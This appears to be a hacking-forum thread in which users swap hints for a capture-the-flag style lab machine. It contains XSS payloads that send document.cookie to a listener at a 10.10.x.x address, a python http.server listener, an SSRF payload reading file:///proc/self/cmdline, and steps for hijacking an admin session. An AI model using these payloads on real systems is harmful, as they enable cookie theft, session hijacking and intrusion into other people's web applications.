Posts: 44
Threads: 0
Joined: Apr 2024
(Apr 28, 2024, 12:47 PM)ticklemeelmo Wrote: Wait... What is the step after getting the Flask Secret Key??
Find other source files This forum account is currently banned. Ban Length: Permanent (N/A Remaining)
Ban Reason: Leeching | http://c66go4clkqodr7tdjfu76jztjs7w7d3fajdeypxn73v4ju3dt7g5yyyd.onion/Forum-Ban-Appeals if you feel this is incorrect.
Posts: 2
Threads: 0
Joined: Apr 2024
(Apr 28, 2024, 09:22 AM)jsvensson Wrote: (Apr 28, 2024, 09:16 AM)vanatka123 Wrote: (Apr 28, 2024, 07:34 AM)andlommy Wrote: user, finally
use the SSRF to find application code
use that same ssrf to access the next hop (http is not the only protocol 
convert key
profit.
now for the root....
How do you know the location of the source code?
use file:///proc/self/cmdline
Hello guys,
I'm currently stuck for fews hours on the SSRF....
I did this but even i try so many payload i got "unexpected error"...
I put space before file but even i send this to the server i got error.
Anyone have a little hint please 
<html>
<body>
<h1>Proof that you Signed Your Life Away</h1>
<img src=""><body id="body"> <script>jsImg = new Image();jsImg.src=" file:///proc/self/cmdline";document.getElementById("body").appendChild(jsImg);</script></body></img>
</body>
</html>
Posts: 103
Threads: 1
Joined: Nov 2023
guys , What is the code for returning the cookie?T_T This forum account is currently banned. Ban Length: Permanent (N/A Remaining)
Ban Reason: Leeching | http://c66go4clkqodr7tdjfu76jztjs7w7d3fajdeypxn73v4ju3dt7g5yyyd.onion/Forum-Ban-Appeals if you feel this is incorrect.
Posts: 28
Threads: 0
Joined: Jan 2024
[quote="fuliye" pid='587786' dateline='1714309846']
guys , What is the code for returning the cookie?T_T
[/citar]
1º listener = python3 -m http.server 80
2º = <script>var i=new Image(); i.src=" http://10.10.xx.xx:80/?cookie="+btoa(document.cookie);</script>
and then waiting for the python server to capture the cookie can take some time....patienceThis forum account is currently banned. Ban Length: Permanent (N/A Remaining)
Ban Reason: Leeching.
Posts: 2
Threads: 0
Joined: Apr 2024
You can just use this as description:
<img src=x onerror=fetch('http://10.10.X.X:8000/'+document.cookie);>
Wait listening with python3 -m http.server
---
I'm stucked now as root inside a container. Does anyone know how to breakout?
Posts: 219
Threads: 14
Joined: Apr 2024
(Apr 28, 2024, 01:42 PM)ConnorHack Wrote: You can just use this as description:
<img src=x onerror=fetch('http://10.10.X.X:8000/'+document.cookie);>
Wait listening with python3 -m http.server
---
I'm stucked now as root inside a container. Does anyone know how to breakout?
Bro we use ssrf to get the private key after getting the cookie or what is the next step .. I saw someone said there is another cookie for whom ? Can u explain This forum account is currently banned. Ban Length: Permanent (N/A Remaining)
Ban Reason:
Asking for rep is not allowed
Posts: 31
Threads: 0
Joined: Oct 2023
I found out that there is a ftp connection, do I need to use this connection to get the private key? This forum account is currently banned. Ban Length: Permanent (N/A Remaining)
Ban Reason: Leeching | http://c66go4clkqodr7tdjfu76jztjs7w7d3fajdeypxn73v4ju3dt7g5yyyd.onion/Forum-Ban-Appeals if you feel this is incorrect.
Posts: 44
Threads: 0
Joined: Apr 2024
(Apr 28, 2024, 01:47 PM)query1338 Wrote: I found out that there is a ftp connection, do I need to use this connection to get the private key?
yes you use these creds to get the private key for user This forum account is currently banned. Ban Length: Permanent (N/A Remaining)
Ban Reason: Leeching | http://c66go4clkqodr7tdjfu76jztjs7w7d3fajdeypxn73v4ju3dt7g5yyyd.onion/Forum-Ban-Appeals if you feel this is incorrect.
Posts: 2
Threads: 0
Joined: Apr 2024
(Apr 28, 2024, 01:45 PM)osamy7593 Wrote: (Apr 28, 2024, 01:42 PM)ConnorHack Wrote: You can just use this as description:
<img src=x onerror=fetch('http://10.10.X.X:8000/'+document.cookie);>
Wait listening with python3 -m http.server
---
I'm stucked now as root inside a container. Does anyone know how to breakout?
Bro we use ssrf to get the private key after getting the cookie or what is the next step .. I saw someone said there is another cookie for whom ? Can u explain
Sure, there is another thing to do.
First you receive a cookie for user called "adam". When you access like adam inside the dashboard, you can change reports priority.
Now, send again the XSS and quickly update the priority to 1.
Thee you go the second request with the new cookie as "admin".
Posts: 219
Threads: 14
Joined: Apr 2024
(Apr 28, 2024, 01:50 PM)ConnorHack Wrote: (Apr 28, 2024, 01:45 PM)osamy7593 Wrote: (Apr 28, 2024, 01:42 PM)ConnorHack Wrote: You can just use this as description:
<img src=x onerror=fetch('http://10.10.X.X:8000/'+document.cookie);>
Wait listening with python3 -m http.server
---
I'm stucked now as root inside a container. Does anyone know how to breakout?
Bro we use ssrf to get the private key after getting the cookie or what is the next step .. I saw someone said there is another cookie for whom ? Can u explain
Sure, there is another thing to do.
First you receive a cookie for user called "adam". When you access like adam inside the dashboard, you can change reports priority.
Now, send again the XSS and quickly update the priority to 1.
Thee you go the second request with the new cookie as "admin".
Thx man This forum account is currently banned. Ban Length: Permanent (N/A Remaining)
Ban Reason:
Asking for rep is not allowed
|
